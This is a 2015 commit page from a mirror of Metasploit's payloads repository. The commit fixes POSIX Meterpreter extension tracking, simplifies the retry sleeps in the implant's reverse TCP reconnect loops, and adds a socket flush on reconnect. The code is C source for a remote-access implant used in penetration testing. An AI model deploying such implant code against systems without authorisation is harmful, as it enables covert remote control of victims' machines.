1
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-12 12:14:29 +01:00

Fix posix extension tracking and transport sleeps

This changeset fixes an issue with POSIX failing to keep track of loaded
extensions properly. The timeout calcs for waiting were trying to be too
smart and hence were simplified.

Also added another flush when reconnecting so that the body of the
second instance of metsrv is ignored by the POSIX side. In future, when
stageless meterpreter works with POSIX, we won't have to do this.
This commit is contained in:
OJ 2015-04-17 21:18:51 +10:00
parent 83f82f3129
commit 1d6e87180a
4 changed files with 19 additions and 24 deletions

View File

@ -80,10 +80,10 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
if (pExtension->init)
{
dprintf("calling InitServerExtension");
pExtension->end = first;
res = pExtension->init(remote);
pExtension->start = extensionCommands;
pExtension->getname = dlsym(library, "GetExtensionName");
pExtension->deinit = dlsym(library, "DeinitServerExtension");
if (pExtension->getname)
@ -99,7 +99,7 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
if (response)
{
for (command = extensionCommands; command != first; command = command->next)
for (command = pExtension->start; command != pExtension->end; command = command->next)
{
packet_add_tlv_string(response, TLV_TYPE_METHOD, command->method);
}

View File

@ -46,6 +46,7 @@ BOOL ext_cmd_callback(LPVOID pState, LPVOID pData)
{
packet_add_tlv_string(pEnum->pResponse, TLV_TYPE_STRING, command->method);
}
dprintf("[LISTEXT] Finished listing extension: %s", pExt->name);
return TRUE;
}

View File

@ -17,7 +17,7 @@ MetsrvConfigData global_config =
.proxy_username = "METERPRETER_USERNAME_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
.proxy_password = "METERPRETER_PASSWORD_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
.ssl_cert_hash = "METERPRETER_SSL_CERT_HASH\x00\x00\x00",
.timeouts.placeholder = "METERP_TIMEOUTS\x00"
.timeouts.values = { .expiry = 24*3600*7, .comms = 300, .retry_total = 3600, .retry_wait = 10 }
};
#define SetHandleInformation(a, b, c)
@ -40,6 +40,7 @@ static DWORD reverse_tcp_run(SOCKET reverseSocket, struct sockaddr* sockAddr, in
{
DWORD result = ERROR_SUCCESS;
int start = current_unix_timestamp();
do
{
int retryStart = current_unix_timestamp();
@ -55,11 +56,7 @@ static DWORD reverse_tcp_run(SOCKET reverseSocket, struct sockaddr* sockAddr, in
}
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
int waited = current_unix_timestamp() - retryStart;
if ((DWORD)waited < retryWait)
{
sleep((retryWait - (DWORD)waited) * 1000);
}
sleep(retryWait);
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
if (result == SOCKET_ERROR)
@ -168,11 +165,7 @@ static DWORD reverse_tcp6(const char* host, const char* service, ULONG scopeId,
}
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
int waited = current_unix_timestamp() - retryStart;
if ((DWORD)waited < retryWait)
{
sleep((retryWait - (DWORD)waited) * 1000);
}
sleep(retryWait);
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
closesocket(socketHandle);
@ -886,6 +879,15 @@ static BOOL configure_tcp_connection(Remote* remote, SOCKET sock)
dprintf("[SERVER] Flushing the socket handle...");
server_socket_flush(remote);
// TODO: remove this when stageless stuff happens.
// if we've just "reconnected" then we're going to flush
// the socket a second time beacuse the second stage is
// coming down and we don't want it!
if (ctx->sock_desc_size > 0)
{
server_socket_flush(remote);
}
dprintf("[SERVER] Initializing SSL...");
if (server_initialize_ssl(remote))
{

View File

@ -47,11 +47,7 @@ static DWORD reverse_tcp_run(SOCKET reverseSocket, SOCKADDR* sockAddr, int sockA
}
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
int waited = current_unix_timestamp() - retryStart;
if ((DWORD)waited < retryWait)
{
Sleep((retryWait - (DWORD)waited) * 1000);
}
Sleep(retryWait * 1000);
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
if (result == SOCKET_ERROR)
@ -168,11 +164,7 @@ static DWORD reverse_tcp6(const char* host, const char* service, ULONG scopeId,
}
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
int waited = current_unix_timestamp() - retryStart;
if ((DWORD)waited < retryWait)
{
Sleep((retryWait - (DWORD)waited) * 1000);
}
Sleep(retryWait * 1000);
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
closesocket(socketHandle);